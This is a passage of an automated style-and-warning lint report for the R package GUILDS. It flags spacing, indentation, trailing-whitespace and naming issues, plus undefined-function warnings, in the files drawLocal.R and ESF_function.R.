xlft)\n^~\n```\n[R/drawLocal.R:33:22:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- max(0, xlft)\n                    ~^~~\n```\n[R/drawLocal.R:34:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n^~\n```\n[R/drawLocal.R:34:22:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                    ~^~~\n```\n[R/drawLocal.R:34:30:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                            ~^~\n```\n[R/drawLocal.R:34:35:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                                 ~^~\n```\n[R/drawLocal.R:35:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- min(1, xrgt)\n^~\n```\n[R/drawLocal.R:35:22:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- min(1, xrgt)\n                    ~^~~\n```\n[R/drawLocal.R:37:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:37:19:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n^~\n```\n[R/drawLocal.R:38:20:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L38) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n                   ^~~~~~~~~\n```\n[R/drawLocal.R:39:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:41:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n^~\n```\n[R/drawLocal.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n                        ~^~~\n```\n[R/drawLocal.R:41:62:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n                                                            ~^~\n```\n[R/drawLocal.R:44:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n^\n```\n[R/drawLocal.R:44:63:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n                                                              ^\n```\n[R/drawLocal.R:45:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t# does not evaluate at the ends.\n^\n```\n[R/drawLocal.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- 1:(j - 1)  \n^\n```\n[R/drawLocal.R:46:12:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- 1:(j - 1)  \n          ~^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^~\n```\n[R/drawLocal.R:47:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n^\n```\n[R/drawLocal.R:47:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L47) *style:* **lines should not be more than 80 characters.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:47:14:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n            ~^~~\n```\n[R/drawLocal.R:47:35:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                 ~^~\n```\n[R/drawLocal.R:47:49:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                ^~\n```\n[R/drawLocal.R:47:54:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                     ^~\n```\n[R/drawLocal.R:47:64:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                              ~^~\n```\n[R/drawLocal.R:47:83:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                                                 ~^~\n```\n[R/drawLocal.R:48:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- c(k2, j)\n^\n```\n[R/drawLocal.R:48:12:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- c(k2, j)\n          ~^~~\n```\n[R/drawLocal.R:49:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- c(kesk, 0)\n^\n```\n[R/drawLocal.R:49:14:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- c(kesk, 0)\n            ~^~~\n```\n[R/drawLocal.R:50:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk <- kesk / k2\n^\n```\n[R/drawLocal.R:50:13:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk <- kesk / k2\n           ~^\n```\n[R/drawLocal.R:51:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n^\n```\n[R/drawLocal.R:51:17:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n               ~^~\n```\n[R/drawLocal.R:51:34:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n                                ~^~~\n```\n[R/drawLocal.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(esk)\n^\n```\n[R/drawLocal.R:58:5:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L58) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(length(idx0) > 0) {\n    ^\n```\n[R/drawLocal.R:59:42:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​    aux <- log(th) + lgamma(I) - lgamma(I+j) +\n                                        ~^~\n```\n[R/drawLocal.R:66:9:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n        ^\n```\n[R/drawLocal.R:66:11:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n         ~^~\n```\n[R/drawLocal.R:66:14:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n            ~^~~\n```\n[R/drawLocal.R:66:16:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n               ^\n```\n[R/drawLocal.R:66:17:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n                ^\n```\n[R/drawLocal.R:68:27:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L68) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                          ^\n```\n[R/drawLocal.R:68:28:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L68) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                           ^\n```\n[R/drawLocal.R:68:31:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L68) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                             ~^~~\n```\n[R/drawLocal.R:68:37:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L68) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                                    ^~~\n```\n[R/drawLocal.R:70:27:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L70) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                          ^\n```\n[R/drawLocal.R:70:28:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L70) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                           ^\n```\n[R/drawLocal.R:70:31:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                             ~^~~\n```\n[R/drawLocal.R:70:37:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                                   ~^~~\n```\n[R/drawLocal.R:74:17:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L74) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  idxp <- which((x > 0) & (x < 1))\n                ^\n```\n[R/drawLocal.R:76:29:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​  aux <- log(th) + lgamma(I)-lgamma(I + j) +\n                           ~^~\n```\n[R/drawLocal.R:80:13:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L80) *style:* **Put spaces around all infix operators.**\n```r\n​         (th-1) * log(1 - xx) - log(xx)\n           ~^~\n```\n[R/drawLocal.R:87:9:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L87) *warning:* **no visible global function definition for ‘getpx’, Did you mean 'get'?**\n```r\n​  nx <- getpx(theta, alpha_x, alpha_y, JX, JY)\n        ^~~~~\n```\n[R/drawLocal.R:91:27:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L91) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:92:27:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L92) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:94:11:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L94) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx <- pm_sad(theta, I_X, JX)\n          ^~~~~~\n```\n[R/drawLocal.R:95:11:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L95) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady <- pm_sad(theta, I_Y, JY)\n          ^~~~~~\n```\n[R/drawLocal.R:106:27:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L106) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                         ~^~\n```\n[R/drawLocal.R:106:66:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L106) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                 ^\n```\n[R/drawLocal.R:107:27:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L107) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:110:3:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L110) *style:* **Variable and function names should be all lowercase.**\n```r\n​  allN <- 0:J\n  ^~~~\n```\n[R/drawLocal.R:111:5:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L111) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(is.infinite(I_X) && is.infinite(I_Y)) {\n    ^\n```\n[R/drawLocal.R:112:28:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L112) *style:* **Put spaces around all infix operators.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                          ~^~\n```\n[R/drawLocal.R:112:33:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L112) *style:* **Trailing whitespace is superfluous.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                                ^\n```\n[R/drawLocal.R:113:27:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L113) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  (lgamma(allN + 1) + \n                          ^~~~\n```\n[R/drawLocal.R:113:38:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L113) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  (lgamma(allN + 1) + \n                                     ^\n```\n[R/drawLocal.R:114:30:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L114) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  lgamma(J - allN + 1)) + \n                             ^~~~\n```\n[R/drawLocal.R:114:42:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L114) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  lgamma(J - allN + 1)) + \n                                         ^\n```\n[R/drawLocal.R:115:21:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    allN * log(nx) + \n                    ^~~~\n```\n[R/drawLocal.R:115:37:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L115) *style:* **Trailing whitespace is superfluous.**\n```r\n​                    allN * log(nx) + \n                                    ^\n```\n[R/drawLocal.R:116:23:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L116) *style:* **Put spaces around all infix operators.**\n```r\n​                    (J-allN) * log(ny))\n                     ~^~\n```\n[R/drawLocal.R:116:24:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L116) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    (J-allN) * log(ny))\n                       ^~~~\n```\n[R/drawLocal.R:118:14:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L118) *warning:* **no visible global function definition for ‘polyaeggenberger’**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN)\n             ^~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:118:44:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN)\n                                           ^~~~\n```\n[R/drawLocal.R:124:11:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L124) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx <- pm_sad(theta, I_X, NX)\n          ^~~~~~\n```\n[R/drawLocal.R:125:11:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/drawLocal.R#L125) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady <- pm_sad(theta, I_Y, NY)\n          ^~~~~~\n```\n[R/ESF_function.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.ESF <- function(theta, m, abund) {\n^~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:2:5:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L2) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(theta < 1 || \n    ^\n```\n[R/ESF_function.R:2:18:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L2) *style:* **Trailing whitespace is superfluous.**\n```r\n​  if(theta < 1 || \n                 ^\n```\n[R/ESF_function.R:3:12:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​     m > (1-.Machine$double.eps) ||\n          ~^~\n```\n[R/ESF_function.R:11:14:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​  I <- m * (J-1) / (1 - m)\n            ~^~\n```\n[R/ESF_function.R:13:10:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L13) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:13:10:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L13) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:15:13:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L15) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)  \n            ^~~~~~~~~~~~\n```\n[R/ESF_function.R:15:46:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L15) *style:* **Trailing whitespace is superfluous.**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)  \n                                             ^~\n```\n[R/ESF_function.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L16) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/ESF_function.R:19:6:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in seq_along(x)) freq_x[i] <- x[[i]]\n     ^\n```\n[R/ESF_function.R:20:18:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  prefactor1 <- -( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                 ^\n```\n[R/ESF_function.R:20:18:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L20) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  prefactor1 <- -( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                 ^\n```\n[R/ESF_function.R:20:61:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L20) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  prefactor1 <- -( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                                                            ^\n```\n[R/ESF_function.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L21) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ESF_function.R:23:22:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​  factor1 <- lgamma(J+1) + prefactor1  \n                    ~^~\n```\n[R/ESF_function.R:23:38:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  factor1 <- lgamma(J+1) + prefactor1  \n                                     ^~\n```\n[R/ESF_function.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L24) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ESF_function.R:25:15:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​  factor2 <- S*log(theta)   -  (lgamma(I + J) - lgamma(I))\n             ~^~\n```\n[R/ESF_function.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ESF_function.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n^\n```\n[R/ESF_function.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\treturn(out)\n^~\n```\n[R/ESF_function.R:35:5:](https://github.com/thijsjanzen/GUILDS/blob/227c27db872cc36f220af7e8e5bc589ca60064ab/R/ESF_function.R#L35) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(theta < 1 || \n    